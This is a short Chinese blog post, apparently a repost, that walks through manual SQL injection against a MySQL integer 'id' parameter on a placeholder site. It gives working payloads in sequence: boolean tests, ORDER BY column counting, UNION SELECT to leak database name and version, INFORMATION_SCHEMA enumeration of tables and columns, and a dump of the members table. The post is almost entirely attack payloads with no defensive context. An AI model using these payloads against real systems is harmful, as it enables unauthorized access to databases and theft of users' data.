zoukankan      html  css  js  c++  java
  • MySQL整形手工注入

    0x1 判断注入点:

    http://www.xxx.org/members.php?id=1 and 1=1 --+ # ture

    http://www.xxx.org/members.php?id=1 and 1=2 --+ # fase

    0x2 枚举当前的列

    http://www.xxx.org/members.php?id=1 order by 5 #false

    http://www.xxx.org/members.php?id=1 order by 4 $true

    0x3 枚举当前字段,让其报错

    http://www.xxx.org/members.php?id=-1 union select 1,2,3,4

    0x4 获取当前数据库信息

    http://www.xxx.org/members.php?id=-1 union select 1,database(),3,version()

    database: db83231_asfaa

    0x5 获取当前库的表

    http://www.xxx.org/members.php?id=-1 +UNION+ALL+SELECT+1,2,3,(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE())

     0x6 获取members表的列

    http://www.xxx.org/members.php?id=-1 +UNION+ALL+SELECT+1,2,3,(SELECT+GROUP_CONCAT(column_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x6d656d62657273)

    0x7 获取字段数据

    http://www.xxx.org/members.php?id=-1 +UNION+ALL+SELECT+1,2,3,(SELECT+GROUP_CONCAT(id,nome,imagem,texto+SEPARATOR+0x3c62723e)+FROM+members)

  • 相关阅读:
    深度学习(十六) ReLU为什么比Sigmoid效果好
    逻辑回归和线性回归区别
    KNN理解
    词向量总结
    HTTP TCP/IP Socket
    AutoMapper控件
    Oracle数据库调优总结
    深度学习(十五) TextCNN理解
    从几张图来看看越来越难做的前端
    ES6学习笔记
  • 原文地址:https://www.cnblogs.com/hack404/p/10832569.html
Copyright © 2011-2022 走看看